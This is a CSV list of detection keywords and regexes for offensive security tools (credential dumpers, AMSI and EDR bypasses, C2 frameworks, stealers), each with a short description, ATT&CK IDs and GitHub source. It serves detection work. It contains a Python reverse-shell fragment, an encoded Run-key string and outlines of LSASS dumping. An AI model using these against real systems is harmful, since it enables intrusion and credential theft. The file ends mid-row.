"*'S','e','D','e','b','u','g','P','r','i','v','i','l','e','g','e'*",".{0,1000}\'S\',\'e\',\'D\',\'e\',\'b\',\'u\',\'g\',\'P\',\'r\',\'i\',\'v\',\'i\',\'l\',\'e\',\'g\',\'e\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(*os.dup2(s.fileno*pty.spawn(""/bin/bash*",".{0,1000}s\=socket\.socket\(socket\.AF_INET,socket\.SOCK_STREAM\)\;s\.connect\(.{0,1000}os\.dup2\(s\.fileno.{0,1000}pty\.spawn\(\""\/bin\/bash.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" 
"*s0lst1c3*",".{0,1000}s0lst1c3.{0,1000}","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/s0lst1c3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*s0md3v*",".{0,1000}s0md3v.{0,1000}","offensive_tool_keyword","Github Username","github username hosting offensive tools. mostly for web hacking","N/A","N/A","N/A","N/A","Web Attacks","https://github.com/s0md3v","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*s0md3v*Striker*",".{0,1000}s0md3v.{0,1000}Striker.{0,1000}","offensive_tool_keyword","Striker","Recon & Vulnerability Scanning Suite for web services","T1210.001 - T1190 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/s0md3v/Striker","1","1","N/A","N/A","10","2175","450","2023-06-04T20:15:11Z","2017-10-30T07:08:02Z" "*S12cybersecurity/Admin2Sys*",".{0,1000}S12cybersecurity\/Admin2Sys.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","37","16","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" "*S12cybersecurity/RDPCredentialStealer*",".{0,1000}S12cybersecurity\/RDPCredentialStealer.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*S1ckB0y1337/TokenPlayer*",".{0,1000}S1ckB0y1337\/TokenPlayer.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - 
T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*S1lkys/SharpKiller*",".{0,1000}S1lkys\/SharpKiller.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*S3cretP4ssw0rd!*",".{0,1000}S3cretP4ssw0rd!.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*S3cur3Th1sSh1t*",".{0,1000}S3cur3Th1sSh1t.{0,1000}","offensive_tool_keyword","Github Username","Github username of hackr known for exploitation scripts Pentesting. 
scripting and pwning!","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*S3cur3Th1sSh1t/Amsi-Bypass-Powershell*",".{0,1000}S3cur3Th1sSh1t\/Amsi\-Bypass\-Powershell.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*S3cur3Th1sSh1t/MultiPotato*",".{0,1000}S3cur3Th1sSh1t\/MultiPotato.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*S3cur3Th1sSh1t/PowerSharpPack*",".{0,1000}S3cur3Th1sSh1t\/PowerSharpPack.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*s3scanner -*",".{0,1000}s3scanner\s\-.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*s3scanner dump *",".{0,1000}s3scanner\sdump\s.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - 
T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*s3scanner scan *",".{0,1000}s3scanner\sscan\s.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*S3Scanner-master*",".{0,1000}S3Scanner\-master.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*s4u.x64.c*",".{0,1000}s4u\.x64\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*s4u.x64.o*",".{0,1000}s4u\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*S4U2self.py*",".{0,1000}S4U2self\.py.{0,1000}","offensive_tool_keyword","POC","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*S4uDelegator.*",".{0,1000}S4uDelegator\..{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 
- T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*S4UTomato 1.0.0-beta*",".{0,1000}S4UTomato\s1\.0\.0\-beta.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*S4UTomato.csproj*",".{0,1000}S4UTomato\.csproj.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*S4UTomato.exe*",".{0,1000}S4UTomato\.exe.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*S4UTomato.sln*",".{0,1000}S4UTomato\.sln.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*S4UTomato-master*",".{0,1000}S4UTomato\-master.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - 
T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*S74r77Hr34D(*",".{0,1000}S74r77Hr34D\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*s74r787Hr34D(*",".{0,1000}s74r787Hr34D\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*s7scan*",".{0,1000}s7scan.{0,1000}","offensive_tool_keyword","Github Username","s7scan is a tool that scans networks. enumerates Siemens PLCs and gathers basic information about them. such as PLC firmware and hardware version. network configuration and security parameters. 
It is completely written on Python.","T1046 - T1018 - T1049 - T1040 - T1016 - T1057","TA0043 - TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/klsecservices/s7scan","1","1","N/A","N/A","2","126","45","2018-12-28T12:11:56Z","2018-10-12T08:52:04Z" "*sa7mon/S3Scanner*",".{0,1000}sa7mon\/S3Scanner.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*SaadAhla/dropper*",".{0,1000}SaadAhla\/dropper.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","1","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*SaadAhla/UnhookingPatch*",".{0,1000}SaadAhla\/UnhookingPatch.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","1","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*SABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4A*",".{0,1000}SABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4A.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*sadshade/veeam-creds*",".{0,1000}sadshade\/veeam\-creds.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*safari_in_operator_side_effect.*",".{0,1000}safari_in_operator_side_effect\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*safari_proxy_object_type_confusion.*",".{0,1000}safari_proxy_object_type_confusion\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*SafeBreach-Labs/EDRaser*",".{0,1000}SafeBreach\-Labs\/EDRaser.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*SafeBreach-Labs/PoolParty*",".{0,1000}SafeBreach\-Labs\/PoolParty.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*safetydump*",".{0,1000}safetydump.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - 
T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*safetydump.ninja*",".{0,1000}safetydump\.ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*safetydump.ninja*",".{0,1000}safetydump\.ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*SafetyKatz.csproj*",".{0,1000}SafetyKatz\.csproj.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. 
removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1156","236","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1156","236","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SafetyKatz.json*",".{0,1000}SafetyKatz\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*SafetyKatz.Program*",".{0,1000}SafetyKatz\.Program.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SafetyKatz.sln*",".{0,1000}SafetyKatz\.sln.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. 
removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1156","236","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*safetykatz.txt*",".{0,1000}safetykatz\.txt.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SafetyKatzManager*",".{0,1000}SafetyKatzManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SafetyKatz-master*",".{0,1000}SafetyKatz\-master.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. 
removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1156","236","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*sailay1996*",".{0,1000}sailay1996.{0,1000}","offensive_tool_keyword","Github Username","github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/sailay1996","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sAINT*launch4j.tar.xz*",".{0,1000}sAINT.{0,1000}launch4j\.tar\.xz.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*sAINT\lib\activation.jar*",".{0,1000}sAINT\\lib\\activation\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a 